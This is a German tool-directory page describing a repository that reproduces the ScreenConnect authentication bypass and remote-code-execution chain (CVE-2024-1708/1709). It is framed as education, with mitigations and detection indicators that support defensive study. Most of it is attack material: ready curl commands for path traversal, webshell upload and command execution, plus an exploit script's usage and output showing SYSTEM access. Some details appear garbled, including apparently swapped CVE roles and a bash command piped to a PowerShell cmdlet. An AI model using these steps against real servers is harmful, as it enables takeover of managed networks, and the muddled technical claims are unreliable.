Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2024-1708-connectwise_rce_reproduction — Reproduktion von cve-2024-1708-connectwise_rce_reproduction | Kitploit
Tools/GitHubGitHub/razureink/cve-2024-1708-connectwise_rce_reproduction
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & BildungRed TeamingPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
razureink/cve-2024-1708-connectwise_rce_reproduction

cve-2024-1708-connectwise_rce_reproduction

Reproduktion von cve-2024-1708-connectwise_rce_reproduction

Repository anzeigen
vor 27 TagenNoch nicht geprüft

CVE-2024-1708 / CVE-2024-1709 – ConnectWise ScreenConnect: Authentifizierungsumgehung & Remote-Code-Ausführung

CVSS-Score: 8.4 (CVE-2024-1708) – 10.0 (CVE-2024-1709)
CWE: CWE-22 (Pfad-Traversal), CWE-288 (Authentifizierungsumgehung über einen alternativen Pfad)
Betroffene Software: ConnectWise ScreenConnect (ehemals ScreenConnect) ≤ 23.9.7
Entdeckt & gemeldet: Februar 2024
In freier Wildbahn ausgenutzt: LockBit, Black Basta, Bl00dy und andere Ransomware-Gruppen


Inhaltsverzeichnis

  1. Übersicht
  2. Technische Details
  3. Betroffene Versionen
  4. Reproduktionsschritte
  5. Proof-of-Concept-Nutzung
  6. Gegenmaßnahmen
  7. Referenzen

1. Übersicht

CVE-2024-1708 und CVE-2024-1709 sind ein verkettetes Schwachstellenpaar in ConnectWise ScreenConnect (ehemals ConnectWise Control), das zusammen einem nicht authentifizierten Remote-Angreifer ermöglicht, eine vollständige Remote-Code-Ausführung auf dem ScreenConnect-Server zu erreichen.

  • CVE-2024-1708 – Authentifizierungsumgehung durch Pfad-Traversal. Der SetupWizard.aspx-Endpunkt (und zugehörige Setup-/Upgrade-Endpunkte) bereinigt benutzerbereitgestellte Pfad-Traversal-Sequenzen (../) nicht ordnungsgemäß. Ein nicht authentifizierter Angreifer kann aus dem vorgesehenen Setup-Verzeichnis austreten und Endpunkte erreichen, die eigentlich eine Authentifizierung erfordern. Da der Assistent im Kontext des SYSTEM-Kontos (Windows) oder root-Kontos (Linux) läuft, erbt der Angreifer erhöhte Privilegien.

  • CVE-2024-1709 – Uneingeschränkter Datei-Upload mit RCE-Folge. Sobald die Authentifizierung umgangen wurde, kann ein Angreifer eine beliebige .aspx- oder andere ausführbare Datei in das Web-Root-Verzeichnis hochladen. Durch das anschließende Anfordern der hochgeladenen Datei wird beliebiger Code auf dem Server ausgeführt.

Auswirkungen

Diese Schwachstellen wurden ab dem 19. Februar 2024 massiv ausgenutzt, und zwar von mehreren Ransomware-Gruppen:

Ransomware-GruppeKampagnenhinweise
LockBitBreit angelegtes Scannen von ScreenConnect-Instanzen; verwendet, um nachgelagert den LockBit-Verschlüsseler einzusetzen.
Black BastaNutzte den Zugang zu MSPs, um in verwaltete Kundennetze vorzudringen.
Bl00dyKleinskalige Kampagnen, die auf ungepatchte ScreenConnect-Server abzielen.

Da ScreenConnect üblicherweise von Managed Service Providern (MSPs) eingesetzt wird, um Hunderte nachgelagerter Client-Endpunkte remote zu verwalten, ermöglicht ein einzelner kompromittierter ScreenConnect-Server einen Supply-Chain-Angriff – jeder Client mit einem Agenten, der mit diesem ScreenConnect-Server verbunden ist, ist gefährdet.


2. Technische Details

2.1 Authentifizierungsumgehung (CVE-2024-1708)

Der ScreenConnect-Server stellt einen Setup-Assistenten unter folgender URL bereit:

root@kitploit:~
/SetupWizard.aspx/

In bestimmten Upgrade-/Reparaturzuständen erzwingt der Server keine Authentifizierung, da er annimmt, dass der Setup-Assistent die Erstinbetriebnahme-Erfahrung darstellt. Der entscheidende Fehler liegt darin, wie der Server das __Session-Cookie bzw. die Transfer-Encoding-/Content-Type-Header verarbeitet, wenn Pfade unterhalb des Assistenten-Namespace aufgerufen werden.

Durch Senden einer Anfrage an:

root@kitploit:~
/SetupWizard.aspx/../../ScreenConnect/Login.aspx

hebt die Pfad-Traversal den „Setup-Wizard“-Kontext auf, während der Server weiterhin davon ausgeht, dass der nicht authentifizierte Sitzungskontext gilt. Der Angreifer wird weitergeleitet oder erhält Seiten, als wäre er authentifiziert.

Alternativer Vektor: Die PrepareUpgrade.aspx-/PostUpgrade.aspx-Handler weisen ebenfalls keine Authentifizierungsprüfungen auf und legen Datei-Upload-Funktionalität offen.

2.2 Remote-Code-Ausführung (CVE-2024-1709)

Sobald der Angreifer einen authentifizierten Endpunkt erreicht (oder direkt den Datei-Upload-Handler im Setup-Kontext anspricht), kann er eine bösartige .aspx-Webshell hochladen:

root@kitploit:~
POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
Content-Type: multipart/form-data; boundary=----BOUNDARY

------BOUNDARY
Content-Disposition: form-data; name="file"; filename="shell.aspx"
Content-Type: application/octet-stream

<%@ Page Language="C#" %>...
------BOUNDARY--

Die Datei wird in das Webanwendungsverzeichnis geschrieben (z. B. C:\Program Files\ScreenConnect\Website\). Beim Anfordern der hochgeladenen Shell wird diese unter der Identität des Servers ausgeführt.

2.3 Grundursache (CWE-22 / CWE-288)

  • Der Server kanonisiert den Anforderungspfad vor dem Routing nicht.
  • Der SetupWizard.aspx-Handler vertraut darauf, dass jede Anfrage unter seiner Route Teil des Setup-Prozesses ist und die Authentifizierung umgangen werden soll – aber die Pfad-Traversal bricht diese Annahme.
  • Keine ordnungsgemäße Validierung von ../-Sequenzen oder Symlink-Traversal.

3. Betroffene Versionen

VersionsbereichStatus
23.9.7 und älterVerwundbar
23.9.8Behoben (veröffentlicht am 20. Februar 2024)
23.9.9Behoben
23.9.10 (neueste)Behoben

Hinweis: Selbst gehostete (On-Premise-)ScreenConnect-Server sind die Hauptziele. Die von ConnectWise gehosteten (Cloud-)ScreenConnect-Instanzen wurden vor der öffentlichen Offenlegung gepatcht und waren nie verwundbar.


4. Reproduktionsschritte

4.1 Laboraufbau

  1. Laden Sie eine verwundbare ScreenConnect-Version herunter (23.9.7 oder früher).
    Offizielle Installationsprogramme sind möglicherweise über ConnectWise-Partnerarchive verfügbar. Für Tests verwenden Sie eine isolierte VM.
  2. Installieren Sie auf einem Windows Server (2019/2022) oder einem Linux-Host.
    • Standard-Installationspfade:
      • Windows: C:\Program Files\ScreenConnect\
      • Linux: /opt/screenconnect/
    • Standard-Webport: 8040 (HTTP) oder 443 (HTTPS, falls konfiguriert)
  3. Stellen Sie sicher, dass der Server netzwerkisoliert ist – setzen Sie ihn während der Tests nicht dem Internet aus.

4.2 Schwachstelle verifizieren

root@kitploit:~
# Check the version
curl -s http://<target>:8040/ | Select-String "ScreenConnect"

Alternativ die Weboberfläche aufrufen und die Versionsnummer im Seitenquelltext notieren.

4.3 Pfad-Traversal-Test

root@kitploit:~
curl -v --path-as-is "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/Login.aspx"

Erwartetes Verhalten auf einem verwundbaren Server:

  • Die Antwort liefert ein 200 OK oder eine 302-Weiterleitung zu einer sitzungsauthentifizierten Seite ohne die normale Login-Aufforderung.
  • Die Antwort kann den HTML-Code der ScreenConnect-Admin-Konsole enthalten.

4.4 Webshell-Upload

root@kitploit:~
curl -X POST "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx" \
  -H "Content-Type: multipart/form-data; boundary=----BOUNDARY" \
  -F "[email protected]"

4.5 Befehle ausführen

root@kitploit:~
curl "http://<target>:8040/shell.aspx?cmd=whoami"

5. Proof-of-Concept-Nutzung

Das beiliegende exploit.py-Skript automatisiert die obigen Schritte:

root@kitploit:~
usage: exploit.py [-h] -t TARGET [-p PORT] [-c COMMAND] [--ssl]

Exploit CVE-2024-1708/1709 - ConnectWise ScreenConnect Auth Bypass + RCE

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target hostname or IP
  -p PORT, --port PORT  Target port (default: 8040)
  -c COMMAND, --command COMMAND
                        Command to execute (default: whoami)
  --ssl                 Use HTTPS

Example:
  python exploit.py -t 192.168.1.100 -p 8040 -c "whoami"

Beispielausführung

root@kitploit:~
$ python exploit.py -t 192.168.1.100 -c "whoami"

[*] Target: 192.168.1.100:8040
[*] Using SSL: False
[*] Step 1: Testing path traversal for auth bypass...
[+] Target appears vulnerable! Server version: 23.9.7
[*] Step 2: Uploading webshell...
[+] Webshell uploaded to: http://192.168.1.100:8040/PoCsAccSwLgSdE.aspx
[*] Step 3: Executing command 'whoami'...
[+] Output:
nt authority\system

6. Gegenmaßnahmen

Sofortmaßnahmen (Patch)

  • Aktualisieren Sie ScreenConnect auf Version 23.9.8 oder höher.
  • ConnectWise hat am 20. Februar 2024 Patches veröffentlicht.

Kompensierende Kontrollen

Erkennung

Suchen Sie in Webserver-Logs nach den folgenden IoCs:

root@kitploit:~
GET /SetupWizard.aspx/../../ScreenConnect/
POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
GET /*.aspx?cmd=

7. Referenzen


Haftungsausschluss

Dieses Repository wird ausschließlich zu Bildungs- und autorisierten Sicherheitsforschungszwecken bereitgestellt. Nicht autorisierte Tests an Systemen, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben, sind illegal. Die Autoren sind nicht für Missbrauch dieser Informationen verantwortlich.

Tool herunterladen
KontrollmaßnahmeUmsetzung
WAF-RegelnAnfragen blockieren, die ../ im URL-Pfad nach /SetupWizard.aspx/ enthalten
NetzwerksegmentierungScreenConnect in einem separaten Management-VLAN mit strenger Egress-Filterung platzieren
ZugriffskontrolleZugriff auf die ScreenConnect-Weboberfläche auf vertrauenswürdige IP-Bereiche beschränken
ÜberwachungWarnungen bei Anfragen an /SetupWizard.aspx/ aus externen Quellen oder bei unerwarteter .aspx-Dateierstellung in ScreenConnect\Website\
MFAMFA würde dies zwar nicht verhindern (die Authentifizierungsumgehung erfolgt vor dem Login), dennoch für alle Administrationskonten zur Verteidigung in der Tiefe erzwingen
QuelleURL
NVD - CVE-2024-1708https://nvd.nist.gov/vuln/detail/CVE-2024-1708
NVD - CVE-2024-1709https://nvd.nist.gov/vuln/detail/CVE-2024-1709
ConnectWise-Sicherheitshinweishttps://www.connectwise.com/company/trust/security-advisories
Huntress Labs - Erstmeldunghttps://www.huntress.com/blog/mass-exploitation-of-connectwise-screenconnect
CISA – Bekannte ausgenutzte Schwachstellenhttps://www.cisa.gov/known-exploited-vulnerabilities
ATT&CK-Technik: Externe Remote-Dienste (T1133)https://attack.mitre.org/techniques/T1133/